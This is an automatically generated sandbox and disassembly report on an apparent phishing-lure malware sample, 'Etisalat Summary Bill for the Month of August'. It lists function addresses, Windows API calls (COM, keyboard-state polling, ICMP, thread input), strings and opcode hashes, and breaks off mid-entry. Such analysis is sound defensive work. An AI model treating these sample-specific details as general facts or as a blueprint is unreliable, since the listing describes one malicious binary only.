Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 3843c549645e3b3766d37161d3124315449aa2ab26d3ce63ecca5e374f911a89
Instruction ID: 9cdbe2efbfd4485699d147f30aaf42985946ae5a599516e3e4eba163d0e4327a
Opcode Fuzzy Hash: 3843c549645e3b3766d37161d3124315449aa2ab26d3ce63ecca5e374f911a89
Instruction Fuzzy Hash: D441F272814229ABDF15EBA8DC859EEB778FF44750F454129E901A31A1EB349E04CFA1

Function 00923C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00923C5C
CoInitialize.OLE32(00000000), ref: 00923C8A
CoUninitialize.OLE32 ref: 00923C94
_wcslen.LIBCMT ref: 00923D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00923DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00923ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00923F0E
CoGetObject.OLE32(?,00000000,0093FB98,?), ref: 00923F2D
SetErrorMode.KERNEL32(00000000), ref: 00923F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00923FC4
VariantClear.OLEAUT32(?), ref: 00923FD8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: fb73a69ccf90fe4781b66c32ccc076802408908ccb54df7c283220f1f6005f44
Instruction ID: a57a3899fb026de6766cf2b1d3d45d7fb9586917c869e81a938b86f5798f79c4
Opcode Fuzzy Hash: fb73a69ccf90fe4781b66c32ccc076802408908ccb54df7c283220f1f6005f44
Instruction Fuzzy Hash: 56C143B1608315AFD700DF68D88492BBBE9FF89744F10891DF98A9B261D734EE05CB52

Function 00917A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00917AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00917B8F
SHGetDesktopFolder.SHELL32(?), ref: 00917BA3
CoCreateInstance.OLE32(0093FD08,00000000,00000001,00966E6C,?), ref: 00917BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00917C74
CoTaskMemFree.OLE32(?,?), ref: 00917CCC
SHBrowseForFolderW.SHELL32(?), ref: 00917D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00917D7A
CoTaskMemFree.OLE32(00000000), ref: 00917D81
CoTaskMemFree.OLE32(00000000), ref: 00917DD6
CoUninitialize.OLE32 ref: 00917DDC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 805d7ef2db893de85d55c790a0b217ffd2a0e7646ff1867a1705ec37c284692c
Instruction ID: 481cbb194897823dff37477cc6f6226cf499bfeb3a75a809d753c52bd3c5f435
Opcode Fuzzy Hash: 805d7ef2db893de85d55c790a0b217ffd2a0e7646ff1867a1705ec37c284692c
Instruction Fuzzy Hash: D1C10A75A04109AFDB14DFA4C884DAEBBF9FF48314B148499E916EB761D730EE81CB90

Function 0093541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00935504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00935515
CharNextW.USER32(00000158), ref: 00935544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00935585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0093559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009355AC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: b4e6dec5b9c5773f46958170756e37aad8f2773460858410fd6128256d90e583
Instruction ID: fef0510a668a1a8b7081cb511a9fc1ed0b36e104cdd8ffae3daa965ce3c35b93
Opcode Fuzzy Hash: b4e6dec5b9c5773f46958170756e37aad8f2773460858410fd6128256d90e583
Instruction Fuzzy Hash: 5E61AC71904609AFDF10CF94CC89AFE7BBAEB0D324F518545F925AB2A0D7749A80DF60

Function 008FFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008FFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 008FFB08
VariantInit.OLEAUT32(?), ref: 008FFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 008FFB3A
VariantCopy.OLEAUT32(?,?), ref: 008FFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 008FFBA1
VariantClear.OLEAUT32(?), ref: 008FFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 008FFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008FFBCC
VariantClear.OLEAUT32(?), ref: 008FFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008FFBE9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6d324a4ac7b76157a2329e400cf9a6e55f204a175242dcfe3c631bd424769c85
Instruction ID: 6cfc9ea3f6cab7461aadbd4936f01d0aec7bf43975c3dd86e1ffe8fa49373920
Opcode Fuzzy Hash: 6d324a4ac7b76157a2329e400cf9a6e55f204a175242dcfe3c631bd424769c85
Instruction Fuzzy Hash: 12415F75A0421DAFCB00DF68D8589BEBBB9FF48354F008069EA55E7262CB30E945CF91

Function 00909C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00909CA1
GetAsyncKeyState.USER32(000000A0), ref: 00909D22
GetKeyState.USER32(000000A0), ref: 00909D3D
GetAsyncKeyState.USER32(000000A1), ref: 00909D57
GetKeyState.USER32(000000A1), ref: 00909D6C
GetAsyncKeyState.USER32(00000011), ref: 00909D84
GetKeyState.USER32(00000011), ref: 00909D96
GetAsyncKeyState.USER32(00000012), ref: 00909DAE
GetKeyState.USER32(00000012), ref: 00909DC0
GetAsyncKeyState.USER32(0000005B), ref: 00909DD8
GetKeyState.USER32(0000005B), ref: 00909DEA

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a896f2b3a0952c2b69b0664ca4e43397767715295a192b5c5e348cd3a5468230
Instruction ID: 3057be58393b6c9f5e5a229718ff5967bc373516af63bd8cf14721a20c753166
Opcode Fuzzy Hash: a896f2b3a0952c2b69b0664ca4e43397767715295a192b5c5e348cd3a5468230
Instruction Fuzzy Hash: DA41CB74948BCA6DFF319764C8043B5FEE8AF11344F04805AEAC6566C3DBA59DC8CB92

Function 0092055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009205BC
inet_addr.WSOCK32(?), ref: 0092061C
gethostbyname.WSOCK32(?), ref: 00920628
IcmpCreateFile.IPHLPAPI ref: 00920636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009206C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009206E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009207B9
WSACleanup.WSOCK32 ref: 009207BF

Strings

Ping, xrefs: 00920676

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: dc1038220c21d380a387722867145f87f9c295df988e26a7a4ce68cb5130711b
Instruction ID: 7df781e09faef7c4b7bf0cb75c4fe8485c50d650cbffe7c7cbe741b512bd1720
Opcode Fuzzy Hash: dc1038220c21d380a387722867145f87f9c295df988e26a7a4ce68cb5130711b
Instruction Fuzzy Hash: 03918C755082119FD320CF19E889F1ABBE8EF84318F1485A9F4699B6A3C730ED45CF82

Function 00928CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00928CF3

Part of subcall function 00908E54: _wcslen.LIBCMT ref: 00908E77

_wcslen.LIBCMT ref: 00928D4E
_wcslen.LIBCMT ref: 00928D9C
_wcslen.LIBCMT ref: 00928DDC
_wcslen.LIBCMT ref: 00928E6E

Strings

cdecl, xrefs: 00928D48, 00928D4D
winapi, xrefs: 00928D96, 00928D9B
stdcall, xrefs: 00928DD6, 00928DDB
none, xrefs: 00928E65, 00928E6A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 88af5b4f62a757af5579390619e2b9bda51519e4fe495118414e39d9fd5fefc8
Instruction ID: c3395c776ed967ad32878f2b96f5f2bfa0337d35552fcdab59e1f97401769050
Opcode Fuzzy Hash: 88af5b4f62a757af5579390619e2b9bda51519e4fe495118414e39d9fd5fefc8
Instruction Fuzzy Hash: D251D132A051269BCF24EF6CD8409BFB7A9FF65324B214629E426E72C8DB34DD44C790

Function 0092372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00923774
CoUninitialize.OLE32 ref: 0092377F
CoCreateInstance.OLE32(?,00000000,00000017,0093FB78,?), ref: 009237D9
IIDFromString.OLE32(?,?), ref: 0092384C
VariantInit.OLEAUT32(?), ref: 009238E4
VariantClear.OLEAUT32(?), ref: 00923936

Strings

Failed to create object, xrefs: 009237E4, 0092389A
Invalid parameter, xrefs: 00923865
NULL Pointer assignment, xrefs: 0092381E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 07b6eb2353005754171515f750136e91066f9dcaed249b21b2f57d6ecd680af0
Instruction ID: e72734144def12dfe8c84fdbace3dfaca2ed18940a3edde4ab15c9e6d2432c71
Opcode Fuzzy Hash: 07b6eb2353005754171515f750136e91066f9dcaed249b21b2f57d6ecd680af0
Instruction Fuzzy Hash: 3761B2B0608721AFD710DF64D848F5AB7E8FF89714F108809F5859B291D778EE48CB92

Function 00913388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009133CF

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009133F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00913504
"%s" (%d) : ==> %s:, xrefs: 00913522
Line %d (File "%s"):, xrefs: 00913443, 0091345C
Incorrect parameters to object property !, xrefs: 009134AB
^ ERROR , xrefs: 0091349E
Error: , xrefs: 009134D1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 7d821534ed9d9d6c27e9d70489265031f6af0acd4a6a28c218324198550422ff
Instruction ID: 89337a33e42828bf1ef940d9d2b238bb2f2011ebd55a4ccf609046e6c9edd726
Opcode Fuzzy Hash: 7d821534ed9d9d6c27e9d70489265031f6af0acd4a6a28c218324198550422ff
Instruction Fuzzy Hash: 2C51B172904209AAEF15EBA4CD42EEEB778FF05344F104061F109B21A2EB352F98DB61

Function 0090B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0090B5FC
_wcslen.LIBCMT ref: 0090B608
_wcslen.LIBCMT ref: 0090B64D
_wcslen.LIBCMT ref: 0090B68C
_wcslen.LIBCMT ref: 0090B6C7

Strings

APPEND, xrefs: 0090B6C1, 0090B6C6
REMOVE, xrefs: 0090B602, 0090B607
EXISTS, xrefs: 0090B686, 0090B68B
KEYS, xrefs: 0090B647, 0090B64C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 01e2a5453f2d2b6ab669ca890c3ffe4f7da4210f5f372c07a9c2751118139e2a
Instruction ID: 91f58376eb723f5cfb3624a3edb5eadb2bdb68f1337eed4f7a117d82a12d4c74
Opcode Fuzzy Hash: 01e2a5453f2d2b6ab669ca890c3ffe4f7da4210f5f372c07a9c2751118139e2a
Instruction Fuzzy Hash: 3041C532A001279ECB205F7DC9905BE7BA9BF61B68B244629E521D72C4E736CD81C790

Function 00915393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009153A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00915416
GetLastError.KERNEL32 ref: 00915420
SetErrorMode.KERNEL32(00000000,READY), ref: 009154A7

Strings

UNKNOWN, xrefs: 00915444
READY, xrefs: 00915460, 00915468
READONLY, xrefs: 00915452
NOTREADY, xrefs: 0091544B
INVALID, xrefs: 00915459

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 840c2e4d728cb20c45cc793d953fe992b5de0722ce082ddbed83267938f70d3d
Instruction ID: fee04e783a75df8a536b88d31bbde2b266bb5667bbdd6ca79f971c1ab091b0e8
Opcode Fuzzy Hash: 840c2e4d728cb20c45cc793d953fe992b5de0722ce082ddbed83267938f70d3d
Instruction Fuzzy Hash: B4319C75A04608DFDB10DF68C884AEABBB8EB85305F568065E405DB2E2DB71DDC2CB91

Function 00933C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00933C79
SetMenu.USER32(?,00000000), ref: 00933C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00933D10
IsMenu.USER32(?), ref: 00933D24
CreatePopupMenu.USER32 ref: 00933D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00933D5B
DrawMenuBar.USER32 ref: 00933D63

Strings

F, xrefs: 00933D4E
0, xrefs: 00933C54

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: a2b20aa05cafd0ad5ca05b3f59dd4c99c5228672098abab5ce06450cf92c8b9c
Instruction ID: 5b88604d47225fcd36edbbbed70aed9f3a1c5bbe2f957b911b211b60021c5dfc
Opcode Fuzzy Hash: a2b20aa05cafd0ad5ca05b3f59dd4c99c5228672098abab5ce06450cf92c8b9c
Instruction Fuzzy Hash: D6417AB9A15609EFDB14CF64D844EEA7BB9FF49350F144028F956A73A0D730AA10DF90

Function 00933A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00933A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00933AA0
GetWindowLongW.USER32(?,000000F0), ref: 00933AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00933AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00933B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00933BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00933BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00933BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00933BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00933C13

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: ac1a8b2c35a014b52b1b50f1094f3b9f20268a732da9279f2c4f3b79d83f5298
Instruction ID: 428d3d9a0e50d6961b1c8f4dd7cdbfb71f3188e2f7038dee3bebc5c7ac5dab54
Opcode Fuzzy Hash: ac1a8b2c35a014b52b1b50f1094f3b9f20268a732da9279f2c4f3b79d83f5298
Instruction Fuzzy Hash: 70616A75A40248AFDB10DFA8CC81EEEB7B8EB49704F104199FA15E72A1C774AE81DF50

Function 0090B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0090B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B165
GetWindowThreadProcessId.USER32(00000000), ref: 0090B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0090B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0090A1E1,?,00000001), ref: 0090B21D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 754efd548a59e12ed9c092d547b6372bdf057596b9c0d66b0e5b251bbb071289
Instruction ID: ba1af3493994a57fb9f2d33eae5a78448ad9b944c51365ffe661b94caded63b4
Opcode Fuzzy Hash: 754efd548a59e12ed9c092d547b6372bdf057596b9c0d66b0e5b251bbb071289
Instruction Fuzzy Hash: D731A0B2528604BFDB109F68DC49B6D7BADBB61315F108405FA19E61D0D7B49E80AF60

Function 008D2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008D2C94

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008D2CA0
_free.LIBCMT ref: 008D2CAB
_free.LIBCMT ref: 008D2CB6
_free.LIBCMT ref: 008D2CC1
_free.LIBCMT ref: 008D2CCC
_free.LIBCMT ref: 008D2CD7
_free.LIBCMT ref: 008D2CE2
_free.LIBCMT ref: 008D2CED
_free.LIBCMT ref: 008D2CFB

Memory Dump Source

